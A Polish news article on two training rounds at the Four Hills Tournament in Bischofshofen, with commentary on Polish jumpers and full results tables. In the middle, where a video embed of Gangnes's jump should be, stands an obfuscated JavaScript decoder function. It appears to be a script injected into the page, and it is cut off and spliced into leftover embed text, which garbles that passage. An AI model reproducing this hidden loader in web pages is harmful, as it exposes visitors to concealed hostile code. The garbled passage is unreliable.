Za nami są dwie serie treningowe przed kwalifikacjami do konkursu Turnieju Czterech Skoczni w Bischofshofen. Najlepiej na skoczni im. Paula Ausserleitnera zaprezentowali się Peter Prevc oraz Kenneth Gangnes, który w swojej próbie przeskoczył rekord skoczni należący do Daiki Ito. Wśród Polaków najlepiej zaprezentował się Dawid Kubacki
1. trening
Najlepszy w pierwszym oficjalnym treningu w Bischofshofen był Peter Prevc, który z obniżonej, 18. belki uzyskał 133,5 metrową odległość. Na drugim miejscu uplasował się wciąż walczący o turniejowe podium Austriak Michael Hayboeck (132,0 m). Trzecie miejsce zajął autor najdłuższej próby – Joachim Hauer (135,0 m / 20. belka). Czołową szóstkę uzupełnili: Stephan Leyhe (134,0 m), Tom Hilde (133,5 m) oraz Kenneth Gangnes (128,5 m).
Zadowalająco w pierwszym treningu spisali się pierwsi ze skaczących Polaków. Andrzej Stękała (128,0 m) i Dawid Kubacki (129,0 m) przez pewien czas znajdowali się na samym czele stawki. Po chwili dołączył do nich skaczący w niesprzyjających warunkach wietrznych Maciej Kot (126,5 m). Ostatecznie wymienieni Polacy zajęli miejsca odpowiednio: 13., 7. i 12. miejsce. Na 19. pozycji ze 123,5 metrową próbą uplasował się Kamil Stoch. Znacznie słabiej zaprezentował się najbardziej doświadczony z biało-czerwonych, Stefan Hula (115,0 m / 48. miejsce).
Na belce startowej nie pojawili się dwaj Japończycy – Daiki Ito oraz Noriaki Kasai. Z udziału w treningach zrezygnował też wicelider PŚ i TCS, Niemiec Severin Freund, który po upadku w Innsbrucku uskarżał się na lekką dolegliwość zdrowotną.
2. trening
W drugiej serii treningowej znakomitym wyczynem popisał się Kenneth Gangnes – Norweg ustając 143,5 metrową próbę (z 18. belki), o pół metra przeskoczył oficjalny rekord obiektu należący do Daiki Ito. Dodajmy, że o oficjalnym rekordzie mówić nie możemy, ponieważ treningowe skoki nie są brane pod uwagę przy ustalaniu oficjalnym rekordów skocznia. Poza podczas jednej z serii próbnych w 2008 roku aż na 145 metrze wylądował tam Gregor Schlierenzauer.
Zobaczcie świetny skok Gangnesa:
function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var y7=”;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0andslaget/”>Hopplandslaget on 5 stycznia 2016
Na drugiej lokacie w treningu, ze sporą stratą punktową do podopiecznego trenera Stoeckla, uplasowali się ex aequo Stefan Kraft (140,0 m / 20. belka) oraz Peter Prevc (135,0 m / 16. belka). W czołowej szóstce znaleźli się ponadto: Michael Hayboeck (137,0 m), Noriaki Kasai (135,0 m) i Andreas Stjernen (135,0 m).
Tym razem nie zachwycili reprezentanci Polski. Najwyżej sklasyfikowany Kamil Stoch był 23. (125,0 m). W czwartej i piątej dziesiątce stawki plasowali się: Dawid Kubacki (121,0 m / 36. miejsce), Maciej Kot (121,5 m / 38. miejsce), Stefan Hula (120,0 m / 41. miejsc) oraz Andrzej Stękała (118,0 m / 49. miejsce).
O godz. 17:00 rozpoczną się kwalifikacje do jutrzejszego konkursu głównego. Transmisja na Eurosporcie 1. Tekstowa relacja live jest dostępna na SkokiPolska.pl >>
Wyniki pierwszego treningu:
zawodnik | kraj | belka | skok I | punkty | |
1 | Peter Prevc | SLO | 18 | 133,5 m | 84.3 |
2 | Michael Hayboeck | AUT | 18 | 132,0 m | 81.5 |
3 | Joachim Hauer | NOR | 20 | 135,0 m | 78.6 |
4 | Stephan Leyhe | GER | 20 | 134,0 m | 77.6 |
5 | Tom Hilde | NOR | 20 | 133,5 m | 76.9 |
6 | Kenneth Gangnes | NOR | 18 | 128,5 m | 73.5 |
7 | Dawid Kubacki | POL | 20 | 129,0 m | 67.4 |
8 | Stefan Kraft | AUT | 18 | 124,5 m | 65.4 |
9 | Vincent Descombes Sevoie | FRA | 20 | 128,0 m | 64.7 |
10 | Jakub Janda | CZE | 20 | 127,0 m | 64.6 |
11 | Andreas Stjernen | NOR | 18 | 122,0 m | 63.5 |
12 | Maciej Kot | POL | 20 | 126,5 m | 63.3 |
13 | Robert Kranjec | SLO | 20 | 127,0 m | 62.7 |
14 | Anze Lanisek | SLO | 20 | 126,0 m | 62.4 |
15 | Andrzej Stękała | POL | 20 | 128,0 m | 61.7 |
16 | Mackenzie Boyd-Clowes | CAN | 20 | 127,0 m | 59.8 |
17 | Johann Andre Forfang | NOR | 18 | 121,0 m | 59.5 |
18 | Richard Freitag | GER | 18 | 120,5 m | 58.5 |
19 | Ville Larinto | FIN | 20 | 127,0 m | 57.6 |
Kamil Stoch | POL | 20 | 123,5 m | 57.6 | |
Jan Matura | CZE | 20 | 123,5 m | 57.6 | |
22 | Kento Sakuyama | JPN | 20 | 124,0 m | 57.5 |
Ronan Lamy Chappuis | FRA | 20 | 124,0 m | 57.5 | |
24 | Taku Takeuchi | JPN | 20 | 123,0 m | 57.2 |
25 | Manuel Fettner | AUT | 20 | 122,5 m | 56.7 |
26 | Andreas Wellinger | GER | 18 | 119,0 m | 55.6 |
27 | Anze Semenic | SLO | 20 | 124,0 m | 54.5 |
28 | Lukas Hlava | CZE | 20 | 122,0 m | 54.2 |
29 | Domen Prevc | SLO | 18 | 118,5 m | 54.1 |
30 | Jurij Tepes | SLO | 20 | 121,5 m | 53.6 |
31 | Anders Fannemel | NOR | 18 | 117,0 m | 53.2 |
Vladislav Boyarintsev | RUS | 20 | 123,5 m | 53.2 | |
33 | Evgeniy Klimov | RUS | 20 | 121,0 m | 52.2 |
34 | Tilen Bartol | SLO | 20 | 121,0 m | 52.1 |
Michael Neumayer | GER | 20 | 121,0 m | 52.1 | |
36 | Andreas Kofler | AUT | 20 | 121,0 m | 51.8 |
Andreas Wank | GER | 18 | 117,0 m | 51.8 | |
38 | Karl Geiger | GER | 20 | 122,5 m | 51.3 |
Simon Ammann | SUI | 18 | 114,0 m | 51.3 | |
40 | Denis Kornilov | RUS | 20 | 121,0 m | 50.9 |
Elias Tollinger | AUT | 20 | 121,0 m | 50.9 | |
42 | Markus Schiffner | AUT | 20 | 121,0 m | 50.8 |
43 | Manuel Poppinger | AUT | 20 | 118,5 m | 50.0 |
44 | Philipp Aschenwald | AUT | 20 | 119,0 m | 49.3 |
45 | Junshiro Kobayashi | JPN | 20 | 121,5 m | 48.8 |
46 | Vladimir Zografski | BUL | 20 | 119,0 m | 46.0 |
47 | Shohei Tochimoto | JPN | 20 | 119,0 m | 45.7 |
48 | Stefan Hula | POL | 20 | 115,0 m | 43.8 |
Gregor Deschwanden | SUI | 20 | 116,0 m | 43.8 | |
50 | Ilmir Hazetdinov | RUS | 20 | 117,0 m | 43.7 |
51 | Roman Koudelka | CZE | 18 | 112,0 m | 43.3 |
52 | Clemens Aigner | AUT | 20 | 118,0 m | 43.0 |
53 | Nicholas Alexander | USA | 20 | 114,0 m | 39.9 |
54 | Florian Altenburger | AUT | 20 | 112,5 m | 38.0 |
55 | Radik Zhaparov | KAZ | 20 | 112,0 m | 34.5 |
56 | Michael Glasder | USA | 20 | 109,0 m | 30.5 |
57 | Thomas Diethart | AUT | 20 | 102,5 m | 19.6 |
58 | Andreas Alamommo | FIN | 20 | 104,0 m | 15.1 |
59 | Martti Nomme | EST | 20 | 100,5 m | 13.0 |
60 | Marat Zhaparov | KAZ | 20 | 103,0 m | 12.9 |
61 | Daniel-Andre Tande | NOR | 18 | 95,0 m | 12.4 |
DNS | Daiki Ito | JPN | - | - | - |
DNS | Noriaki Kasai | JPN | - | - | - |
DNS | Severin Freund | GER | - | - | - |
Wyniki drugiego treningu:
zawodnik | kraj | belka | skok II | punkty | |
1 | Kenneth Gangnes | NOR | 18 | 143,5 m | 96.4 |
2 | Stefan Kraft | AUT | 20 | 140,0 m | 86.5 |
Peter Prevc | SLO | 16 | 135,0 m | 86.5 | |
4 | Michael Hayboeck | AUT | 18 | 137,0 m | 83.1 |
5 | Noriaki Kasai | JPN | 20 | 135,0 m | 77.8 |
6 | Andreas Stjernen | NOR | 20 | 135,0 m | 77.6 |
7 | Stephan Leyhe | GER | 20 | 132,0 m | 77.5 |
8 | Anders Fannemel | NOR | 20 | 134,0 m | 76.0 |
9 | Tom Hilde | NOR | 20 | 132,0 m | 75.9 |
10 | Johann Andre Forfang | NOR | 18 | 132,5 m | 75.8 |
11 | Joachim Hauer | NOR | 20 | 130,0 m | 70.8 |
12 | Andreas Wellinger | GER | 20 | 130,5 m | 69.5 |
13 | Robert Kranjec | SLO | 20 | 128,5 m | 69.4 |
14 | Daniel Andre Tande | NOR | 18 | 128,0 m | 68.7 |
15 | Vincent Descombes Sevoie | FRA | 20 | 129,0 m | 68.1 |
16 | Jurij Tepes | SLO | 20 | 128,5 m | 67.4 |
17 | Roman Koudelka | CZE | 20 | 128,5 m | 65.8 |
18 | Simon Ammann | SUI | 17 C | 127,0 m | 64.7 |
19 | Daiki Ito | JPN | 20 | 124,5 m | 64.1 |
20 | Jakub Janda | CZE | 20 | 125,0 m | 64.0 |
21 | Domen Prevc | SLO | 20 | 127,0 m | 63.7 |
22 | Richard Freitag | GER | 18 | 125,0 m | 63.3 |
23 | Kamil Stoch | POL | 20 | 125,0 m | 62.9 |
24 | Manuel Poppinger | AUT | 20 | 124,0 m | 61.5 |
25 | Manuel Fettner | AUT | 20 | 124,0 m | 60.8 |
26 | Anze Lanisek | SLO | 20 | 122,0 m | 59.2 |
27 | Taku Takeuchi | JPN | 20 | 124,0 m | 59.1 |
28 | Andreas Kofler | AUT | 20 | 123,5 m | 58.7 |
29 | Kento Sakuyama | JPN | 20 | 123,0 m | 58.4 |
30 | Michael Neumayer | GER | 20 | 123,5 m | 58.3 |
31 | Ville Larinto | FIN | 20 | 122,0 m | 58.1 |
32 | Jan Matura | CZE | 20 | 122,0 m | 56.9 |
33 | Markus Schiffner | AUT | 20 | 123,0 m | 56.4 |
34 | Mackenzie Boyd-Clowes | CAN | 20 | 123,0 m | 56.3 |
35 | Florian Altenburger | AUT | 20 | 122,0 m | 56.2 |
36 | Dawid Kubacki | POL | 20 | 121,0 m | 55.3 |
37 | Lukas Hlava | CZE | 20 | 121,5 m | 54.9 |
38 | Maciej Kot | POL | 20 | 121,5 m | 54.5 |
39 | Ilmir Hazetdinov | RUS | 20 | 121,5 m | 53.9 |
40 | Elias Tollinger | AUT | 20 | 120,0 m | 52.8 |
41 | Stefan Hula | POL | 20 | 120,0 m | 52.7 |
42 | Tilen Bartol | SLO | 20 | 119,0 m | 52.1 |
43 | Vladimir Zografski | BUL | 20 | 120,5 m | 51.6 |
44 | Philipp Aschenwald | AUT | 20 | 119,0 m | 50.4 |
45 | Ronan Lamy Chappuis | FRA | 20 | 118,0 m | 49.9 |
46 | Karl Geiger | GER | 20 | 119,0 m | 49.1 |
47 | Gregor Deschwanden | SUI | 20 | 118,0 m | 48.0 |
48 | Evgeniy Klimov | RUS | 20 | 117,0 m | 47.3 |
49 | Andrzej Stękała | POL | 20 | 118,0 m | 46.8 |
50 | Anze Semenic | SLO | 20 | 116,5 m | 46.4 |
51 | Vladislav Boyarintsev | RUS | 20 | 114,0 m | 44.8 |
52 | Clemens Aigner | AUT | 20 | 115,0 m | 44.2 |
53 | Nicholas Alexander | USA | 20 | 114,0 m | 42.8 |
54 | Michael Glasder | USA | 20 | 113,0 m | 42.4 |
55 | Junshiro Kobayashi | JPN | 20 | 111,0 m | 37.0 |
56 | Thomas Diethart | AUT | 20 | 110,0 m | 34.8 |
57 | Andreas Alamommo | FIN | 20 | 107,0 m | 29.3 |
58 | Shohei Tochimoto | JPN | 20 | 107,5 m | 29.0 |
59 | Marat Zhaparov | KAZ | 20 | 107,0 m | 28.6 |
60 | Radik Zhaparov | KAZ | 20 | 105,0 m | 26.5 |
61 | Denis Kornilov | RUS | 20 | 104,5 m | 26.2 |
62 | Martti Nomme | EST | 20 | 103,5 m | 23.1 |
DNS | Andreas Wank | GER | - | - | - |
DNS | Severin Freund | GER | - | - | - |
informacja własna